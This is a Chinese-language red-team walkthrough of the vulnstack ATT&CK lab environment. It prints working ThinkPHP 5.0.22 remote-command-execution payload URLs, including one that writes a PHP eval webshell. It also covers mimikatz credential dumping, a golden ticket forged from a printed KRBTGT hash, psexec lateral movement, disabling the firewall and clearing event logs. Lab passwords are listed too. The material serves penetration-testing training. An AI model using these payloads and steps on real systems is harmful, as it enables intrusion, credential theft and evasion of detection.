ATT&CK实战系列——红队实战(五)
一、环境配置
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
虚拟机密码
win7
sun\heart 123.com
sun\Administrator dc123.com
Win7双网卡模拟内外网
2008
sun\admin 2020.com
网络环境配置如下:
登陆更改一下密码
把phpstudy开启,然后记住这里一定要把网卡配置到相应的位置
网络环境如下:
二、外网打点
使用nmap对外网ip段进行信息收集
nmap -sV 192.168.135.150
有个web站点80、3306 mysql,就先从web站点下手
ThinkPHP 5.0.22 任意命令执行getshell
payload:
1.利用system函数远程命令执行
http://localhost:9096/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
2.通过phpinfo函数写出phpinfo()的信息
http://localhost:9096/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
3.写入shell:
http://localhost:9096/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php
或者http://localhost:9096/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=
打了一波发现是administrator权限
http://192.168.138.128/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
这里就用工具getshell不那么麻烦了,内个蚁剑的编码器好像有点问题
我听说还有~师傅们留下的webshell在里面嗷
直接下载文件得到密码MD5解密
我是一个好人果断把大马删除掉,然后植入一个哥斯拉的shell搞
mysql弱口令
找到TP5连接数据库的文件
猜测账号密码都是root
三、内网渗透
上线CS
权限提升
信息收集
ipconfig /all #定位域控
Ladon 192.168.138.0/24 OnlinePC # 多协议探测存活主机(IP、机器名、MAC地址、制造商)
Ladon 192.168.138.0/24 OsScan #多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)
mimikatz
获取用户密码已经NTLM、SID值
四、横向移动
直接用EW做代理
./ew_for_Win.exe -s ssocksd -l 8888
运行被防火墙拦截了,好家伙果断关闭防火墙
fscan扫描
MS17-010
扫描发现居然有MS17-010在win7上,虽然已经拿下这台机器了但还是试试
Psexec 横向拿下域控
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
psexec 传递
psexec 是微软 pstools 工具包中最常用的一个工具,也是在内网渗透中的免杀渗透利器。psexec 能够在命令行下在对方没有开启 telnet 服务的时候返回一个半交互的命令行,像 telnet 客户端一样。原理是基于IPC共享,所以要目标打开 445 端口。另外在启动这个 psexec 建立连接之后对方机器上会被安装一个服务。
获取凭据后对目标网段进行端口存活探测,因为是 psexec 传递登录,这里仅需探测445端口
命令:portscan ip网段 端口 扫描协议(arp、icmp、none) 线程
例如:portscan 192.168.138.0/24 445 arp 200
黄金票据
在域控获得KRBTGT账户NTLM密码哈希和SID
黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。
黄金票据的条件要求:
1.域名称
2.域的SID值
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名
伪造域的用户名:len
域的名称:SUN
域的SID:S-1-5-21-3388020223-1982701712-4030140183-1110
域的KRBTGT账户NTLM密码哈希:65dc23a67f31503698981f2665f9d858
黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。
WEB机 Administrator 权限机器->右键->Access->Golden Ticket
痕迹清理
windows
1.查看事件日志
run event_manager -i
2.删除事件日志
run event_manager -c
3.clearv命令清除目标系统的事件日志。
参考的大佬们博客:https://blog.csdn.net/qq_38626043/article/details/119141146
本文仅作靶场实战教程,禁止将本文演示的技术方法用于非法活动,违者后果自负。